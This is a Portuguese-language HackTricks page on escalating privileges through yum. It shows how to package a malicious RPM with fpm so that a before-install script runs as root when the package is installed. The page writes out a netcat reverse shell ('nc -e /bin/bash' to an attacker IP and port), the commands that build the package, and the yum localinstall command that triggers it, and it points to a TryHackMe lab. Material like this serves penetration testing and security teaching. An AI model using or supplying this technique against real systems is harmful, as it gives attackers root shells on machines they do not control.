3.8 KiB
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Verifique os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
Mais exemplos sobre yum também podem ser encontrados em gtfobins.
Executando comandos arbitrários via Pacotes RPM
Verificando o Ambiente
Para aproveitar esse vetor, o usuário deve ser capaz de executar comandos yum como um usuário com privilégios mais elevados, ou seja, root.
Um exemplo funcional desse vetor
Um exemplo funcional desse exploit pode ser encontrado na sala daily bugle no tryhackme.
Empacotando um RPM
Na seção a seguir, vou cobrir o empacotamento de um shell reverso em um RPM usando fpm.
O exemplo abaixo cria um pacote que inclui um gatilho before-install com um script arbitrário que pode ser definido pelo atacante. Quando instalado, este pacote executará o comando arbitrário. Eu usei um exemplo simples de shell netcat reverso para demonstração, mas isso pode ser alterado conforme necessário.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Capturando um shell
Usando o exemplo acima e assumindo que o yum
pode ser executado como um usuário de maior privilégio.
- Transferir o rpm para o host
- Iniciar um ouvinte em seu host local, como o exemplo de ouvinte netcat
- Instalar o pacote vulnerável
yum localinstall -y exploited-1.0-1.noarch.rpm
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.